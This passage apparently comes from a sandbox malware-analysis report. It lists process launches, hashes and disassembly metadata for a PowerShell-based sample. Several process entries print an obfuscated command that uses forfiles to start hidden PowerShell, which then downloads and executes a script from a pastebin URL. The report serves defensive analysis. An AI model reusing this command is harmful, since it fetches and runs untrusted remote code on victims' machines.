                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:17
                                                                Start time:10:00:37
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff6e4060000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:18
                                                                Start time:10:00:37
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:19
                                                                Start time:10:00:38
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:20
                                                                Start time:10:00:38
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:21
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\forfiles.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m notepad.exe /c "powershell.exe -command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'"
                                                                Imagebase:0x7ff6e4060000
                                                                File size:52'224 bytes
                                                                MD5 hash:9BB67AEA5E26CB136F23F29CC48D6B9E
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:22
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\conhost.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                Imagebase:0x7ff75da10000
                                                                File size:862'208 bytes
                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:23
                                                                Start time:10:00:45
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:-command powershell -windowstyle h -command 'sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)'
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                General

                                                                Target ID:24
                                                                Start time:10:00:46
                                                                Start date:15/10/2024
                                                                Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                Wow64 process (32bit):false
                                                                Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle h -command "sal fatbake calc;sal callit iEx; sal $env:os iWr; calliT(WINDOWS_NT pastebin.com/raw/sA04Mwk2 -usebasicparsing)"
                                                                Imagebase:0x7ff741d30000
                                                                File size:452'608 bytes
                                                                MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                                                Has elevated privileges:false
                                                                Has administrator privileges:false
                                                                Programmed in:C, C++ or other language
                                                                Has exited:true

                                                                Disassembly

                                                                Reset < >

                                                                  Executed Functions

                                                                  Function 00007FFAAB53B986 Relevance: .5, Instructions: 486COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 1193ae7178a3b45df91d4280b6f157b289fa783dae3635844a93ea9bbfdffaa2
                                                                  • Instruction ID: ff9218cae400134bbbe6d74760be25495bba7fd1a27eb8f9517f1d3d54b6ac42
                                                                  • Opcode Fuzzy Hash: 1193ae7178a3b45df91d4280b6f157b289fa783dae3635844a93ea9bbfdffaa2
                                                                  • Instruction Fuzzy Hash: 0FF1C531909A4E8FEBA8DF28C8557E937D1FB55310F04826EE84EC72D2DF3999458B81
                                                                  Function 00007FFAAB53C732 Relevance: .5, Instructions: 459COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0750fa308c486a19308b1147600e32f491b9c25670618211b40d80de7dc21a9c
                                                                  • Instruction ID: 74c9a30db909b6a9925921eed1b92be0f52478a929a6bfb503e2b8656ff6ae58
                                                                  • Opcode Fuzzy Hash: 0750fa308c486a19308b1147600e32f491b9c25670618211b40d80de7dc21a9c
                                                                  • Instruction Fuzzy Hash: D3E1E770909A4E8FEBA8DF28C8657E977D1FB55310F04826ED84EC7292CF78994587C1
                                                                  Function 00007FFAAB53F18A Relevance: 2.8, Strings: 2, Instructions: 252COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 6A$0WK
                                                                  • API String ID: 0-842960117
                                                                  • Opcode ID: 5fa29f41abcfa138d18f0c5b2356c649d767f6c036b977eb84342bc0969edcdf
                                                                  • Instruction ID: bd85ad47a018b28d846f743e899cabe7395739e50cffed4acc6c7e5e952dea16
                                                                  • Opcode Fuzzy Hash: 5fa29f41abcfa138d18f0c5b2356c649d767f6c036b977eb84342bc0969edcdf
                                                                  • Instruction Fuzzy Hash: 8E71E571A1CF4A8BE758DBA898656B877D1EF49340F0441BDE44EC73E3CE28AC068781
                                                                  Function 00007FFAAB6039C3 Relevance: .4, Instructions: 415COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 8870b5fcc82fc6e0bbb81ec4eab6c9a2a7a71a68ea3c386a4598fc0deaba44a5
                                                                  • Instruction ID: c0116308d905c6e1e247c8a8111b5a6e8d5f2cadcaf806965e50c36572cffe2f
                                                                  • Opcode Fuzzy Hash: 8870b5fcc82fc6e0bbb81ec4eab6c9a2a7a71a68ea3c386a4598fc0deaba44a5
                                                                  • Instruction Fuzzy Hash: 66C1897290EA8A8FE7E5A76988155B57FD0FF1B351B1480FED04CC70E3DA28990983D1
                                                                  Function 00007FFAAB53C346 Relevance: .3, Instructions: 332COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d529afc0068f239c11211f8f9ffad8a1e511aa30c24029691b051c83793e01c1
                                                                  • Instruction ID: b3a2c3cc7fdb7de7ebcff03066c60cfce084de093dc011748cee14e62f18cc84
                                                                  • Opcode Fuzzy Hash: d529afc0068f239c11211f8f9ffad8a1e511aa30c24029691b051c83793e01c1
                                                                  • Instruction Fuzzy Hash: 54B1B77150DB4E8FEBA8DF28D8557E93BD1FF56350F04826EE44EC7292CA3498458B82
                                                                  Function 00007FFAAB603A10 Relevance: .2, Instructions: 248COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 24ff18d100b335aea00cc822db7245cb909706f1a397c928ec3742e255d804f0
                                                                  • Instruction ID: 0be06453a1783fc5559cf1c6becce34bc9a4c6f99e25d085e3a1b0f78c422aa7
                                                                  • Opcode Fuzzy Hash: 24ff18d100b335aea00cc822db7245cb909706f1a397c928ec3742e255d804f0
                                                                  • Instruction Fuzzy Hash: 7E714562E0FA868FE7E5976948515787AD0FF5B386B1890FED04DC70E3DA289C4883D1
                                                                  Function 00007FFAAB603A1B Relevance: .2, Instructions: 243COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3791026db95ed281a4413650e749ac010cdf20aaba040a5c48b5c1c75a763c1c
                                                                  • Instruction ID: bc565b973c39d42e7704970604fe09c20eaae6cf9ba0068a7015056671f037d9
                                                                  • Opcode Fuzzy Hash: 3791026db95ed281a4413650e749ac010cdf20aaba040a5c48b5c1c75a763c1c
                                                                  • Instruction Fuzzy Hash: 71715622E0FB868FE7E5976948515787AD0FF5A386B1880FED04DC70E3DA289D0883C1
                                                                  Function 00007FFAAB603B93 Relevance: .1, Instructions: 136COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1777971003.00007FFAAB600000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB600000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab600000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d03547dee0f810bb1965689eab828e5e5cdfaa8fc4c8c94c9859bc571a7cfc49
                                                                  • Instruction ID: 9754f0069397295a774b565d085062a3a42ffcd933b914e28eeaf7c05d80631d
                                                                  • Opcode Fuzzy Hash: d03547dee0f810bb1965689eab828e5e5cdfaa8fc4c8c94c9859bc571a7cfc49
                                                                  • Instruction Fuzzy Hash: 4C416832B0DA4A8FEBD5DB6C94516B8B7D1FF5A251B1881BFC04DC7193DE29980683C0
                                                                  Function 00007FFAAB53BE44 Relevance: .1, Instructions: 92COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 01863beffccecdac952bb66060b6da2fd7c0e87ed23d709a93eb3962f81cd5da
                                                                  • Instruction ID: 71a449082d71bb01938c81449b982e81deee456929fa74809478d01e7b7e267e
                                                                  • Opcode Fuzzy Hash: 01863beffccecdac952bb66060b6da2fd7c0e87ed23d709a93eb3962f81cd5da
                                                                  • Instruction Fuzzy Hash: 8C310C3081A68ECEFBB49F18CC56BF93295FF46355F408539D40E862E3CA396949CB51
                                                                  Function 00007FFAAB541AFD Relevance: .1, Instructions: 54COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: d7e388c9c1aa2da16b7bf61c8e47a240d31d87d9b7102306f216c870d2d97c13
                                                                  • Instruction ID: d59fa181b92aee70398de55fb4e107e74c9b36927c3bfa9fd364fac501382c1d
                                                                  • Opcode Fuzzy Hash: d7e388c9c1aa2da16b7bf61c8e47a240d31d87d9b7102306f216c870d2d97c13
                                                                  • Instruction Fuzzy Hash: 8701F58489F2C79ED743677458249B37FA88E8316570C45FFE0D9CA0A7E848095AC393
                                                                  Function 00007FFAAB5337B5 Relevance: .0, Instructions: 49COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction ID: bb17bfe6053036c8337829b34fb131fec9f0c0d2ee04dbd79a017af912e10143
                                                                  • Opcode Fuzzy Hash: 08da065673a25bdeb927b4c2f952ba14616e05d90be0e25124618a69153761d0
                                                                  • Instruction Fuzzy Hash: 9501677111CB0D8FD744EF0CE451AA6B7E0FB95364F10056DE58AC36A1D636E892CB45

                                                                  Non-executed Functions

                                                                  Function 00007FFAAB5361B1 Relevance: .8, Instructions: 771COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000007.00000002.1773701094.00007FFAAB530000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB530000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_7_2_7ffaab530000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2c4592aae0263b9d72741353a0cbb5c939ecd3aafa15155eab068d956279fc70
                                                                  • Instruction ID: a7eee4d09305fc59b94c3041737b8a8cc427465c7e64410760bb29c6339a1280
                                                                  • Opcode Fuzzy Hash: 2c4592aae0263b9d72741353a0cbb5c939ecd3aafa15155eab068d956279fc70
                                                                  • Instruction Fuzzy Hash: 7532B392E0E7D78BE356576C98B90F57FA4DF532A570881FFD08E871E3D809680A82D1

                                                                  Execution Graph

                                                                  Execution Coverage:3.4%
                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                  Signature Coverage:0%
                                                                  Total number of Nodes:3
                                                                  Total number of Limit Nodes:0
                                                                  execution_graph 8510 7ffaab526ab4 8511 7ffaab526abd LoadLibraryExW 8510->8511 8513 7ffaab526b6d 8511->8513

                                                                  Executed Functions

                                                                  Function 00007FFAAB526AB4 Relevance: 1.6, APIs: 1, Instructions: 114libraryCOMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 370 7ffaab526ab4-7ffaab526abb 371 7ffaab526abd-7ffaab526ac5 370->371 372 7ffaab526ac6-7ffaab526b2f 370->372 371->372 374 7ffaab526b31-7ffaab526b36 372->374 375 7ffaab526b39-7ffaab526b6b LoadLibraryExW 372->375 374->375 376 7ffaab526b6d 375->376 377 7ffaab526b73-7ffaab526b9a 375->377 376->377
                                                                  APIs
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2377960817.00007FFAAB510000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB510000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab510000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID: LibraryLoad
                                                                  • String ID:
                                                                  • API String ID: 1029625771-0
                                                                  • Opcode ID: 7f287e50fd98af379cae1411d1d9df210b35fb24e06f4efccf0996f8abdd98d7
                                                                  • Instruction ID: 29e73b7ed7e1f37a24a55b9176d4c45b5a034a56506f53556d1e68abe7bc2cec
                                                                  • Opcode Fuzzy Hash: 7f287e50fd98af379cae1411d1d9df210b35fb24e06f4efccf0996f8abdd98d7
                                                                  • Instruction Fuzzy Hash: 3B31E43190CA4C8FDB19DFACC849AE9BBF0EF66320F04826BD009C3152DB74A405CB91
                                                                  Function 00007FFAAB5E33B0 Relevance: .4, Instructions: 433COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 578 7ffaab5e33b0-7ffaab5e33b2 579 7ffaab5e3414-7ffaab5e3464 578->579 580 7ffaab5e33b4-7ffaab5e33cf 578->580 583 7ffaab5e346a-7ffaab5e3474 579->583 584 7ffaab5e36cc-7ffaab5e378b 579->584 580->579 585 7ffaab5e3476-7ffaab5e3483 583->585 586 7ffaab5e348d-7ffaab5e3492 583->586 585->586 591 7ffaab5e3485-7ffaab5e348b 585->591 589 7ffaab5e3498-7ffaab5e349b 586->589 590 7ffaab5e3670-7ffaab5e367a 586->590 594 7ffaab5e34b2 589->594 595 7ffaab5e349d-7ffaab5e34b0 589->595 592 7ffaab5e3689-7ffaab5e36c9 590->592 593 7ffaab5e367c-7ffaab5e3688 590->593 591->586 592->584 598 7ffaab5e34b4-7ffaab5e34b6 594->598 595->598 598->590 600 7ffaab5e34bc-7ffaab5e34f0 598->600 615 7ffaab5e3507 600->615 616 7ffaab5e34f2-7ffaab5e3505 600->616 617 7ffaab5e3509-7ffaab5e350b 615->617 616->617 617->590 620 7ffaab5e3511-7ffaab5e3519 617->620 620->584 621 7ffaab5e351f-7ffaab5e3529 620->621 622 7ffaab5e3545-7ffaab5e3555 621->622 623 7ffaab5e352b-7ffaab5e3543 621->623 622->590 627 7ffaab5e355b-7ffaab5e358c 622->627 623->622 627->590 633 7ffaab5e3592-7ffaab5e35be 627->633 638 7ffaab5e35e9 633->638 639 7ffaab5e35c0-7ffaab5e35e7 633->639 640 7ffaab5e35eb-7ffaab5e35ed 638->640 639->640 640->590 642 7ffaab5e35f3-7ffaab5e35fb 640->642 643 7ffaab5e360b 642->643 644 7ffaab5e35fd-7ffaab5e3607 642->644 645 7ffaab5e3610-7ffaab5e3625 643->645 647 7ffaab5e3627-7ffaab5e3646 644->647 648 7ffaab5e3609 644->648 645->647 652 7ffaab5e3650-7ffaab5e3656 647->652 648->645 653 7ffaab5e365d-7ffaab5e366f 652->653
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2382937207.00007FFAAB5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB5E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab5e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 44e20970ddb8c7d38752ad6106f5d54f78b5bc70ecc6ecfa9b145d1bf380713e
                                                                  • Instruction ID: 1cdfd2e2ecf6f1a5af7be8de1a8183e3118596467510716a010cf17ff0f2c473
                                                                  • Opcode Fuzzy Hash: 44e20970ddb8c7d38752ad6106f5d54f78b5bc70ecc6ecfa9b145d1bf380713e
                                                                  • Instruction Fuzzy Hash: 36D15A6290EA8B8FEB56AB68C8155B97BD4FF46350B0801FED04EC71E3DB18980983D1
                                                                  Function 00007FFAAB5E33D5 Relevance: .3, Instructions: 290COMMON
                                                                  Download Yara Rule

                                                                  Control-flow Graph

                                                                  • Executed
                                                                  • Not Executed
                                                                  control_flow_graph 696 7ffaab5e33d5-7ffaab5e3464 700 7ffaab5e346a-7ffaab5e3474 696->700 701 7ffaab5e36cc-7ffaab5e378b 696->701 702 7ffaab5e3476-7ffaab5e3483 700->702 703 7ffaab5e348d-7ffaab5e3492 700->703 702->703 708 7ffaab5e3485-7ffaab5e348b 702->708 706 7ffaab5e3498-7ffaab5e349b 703->706 707 7ffaab5e3670-7ffaab5e367a 703->707 711 7ffaab5e34b2 706->711 712 7ffaab5e349d-7ffaab5e34b0 706->712 709 7ffaab5e3689-7ffaab5e36c9 707->709 710 7ffaab5e367c-7ffaab5e3688 707->710 708->703 709->701 715 7ffaab5e34b4-7ffaab5e34b6 711->715 712->715 715->707 717 7ffaab5e34bc-7ffaab5e34f0 715->717 732 7ffaab5e3507 717->732 733 7ffaab5e34f2-7ffaab5e3505 717->733 734 7ffaab5e3509-7ffaab5e350b 732->734 733->734 734->707 737 7ffaab5e3511-7ffaab5e3519 734->737 737->701 738 7ffaab5e351f-7ffaab5e3529 737->738 739 7ffaab5e3545-7ffaab5e3555 738->739 740 7ffaab5e352b-7ffaab5e3543 738->740 739->707 744 7ffaab5e355b-7ffaab5e358c 739->744 740->739 744->707 750 7ffaab5e3592-7ffaab5e35be 744->750 755 7ffaab5e35e9 750->755 756 7ffaab5e35c0-7ffaab5e35e7 750->756 757 7ffaab5e35eb-7ffaab5e35ed 755->757 756->757 757->707 759 7ffaab5e35f3-7ffaab5e35fb 757->759 760 7ffaab5e360b 759->760 761 7ffaab5e35fd-7ffaab5e3607 759->761 762 7ffaab5e3610-7ffaab5e3625 760->762 764 7ffaab5e3627-7ffaab5e3656 761->764 765 7ffaab5e3609 761->765 762->764 770 7ffaab5e365d-7ffaab5e366f 764->770 765->762
                                                                  Memory Dump Source
                                                                  • Source File: 00000014.00000002.2382937207.00007FFAAB5E0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAB5E0000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_20_2_7ffaab5e0000_powershell.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: c2f3c5e5d59d4b7e80a2db0508d38a036efac0e3b2204e65dcda102c7b52987d
                                                                  • Instruction ID: f5e583cb048eab44ade7859e40aa6793743981327d8bfb2e5e17e3e948b94ff9
                                                                  • Opcode Fuzzy Hash: c2f3c5e5d59d4b7e80a2db0508d38a036efac0e3b2204e65dcda102c7b52987d
                                                                  • Instruction Fuzzy Hash: 5C91F36290E6878FE7A69B6884555B97F95FF46240B5C40FAD04ECB1A3CA18980983D1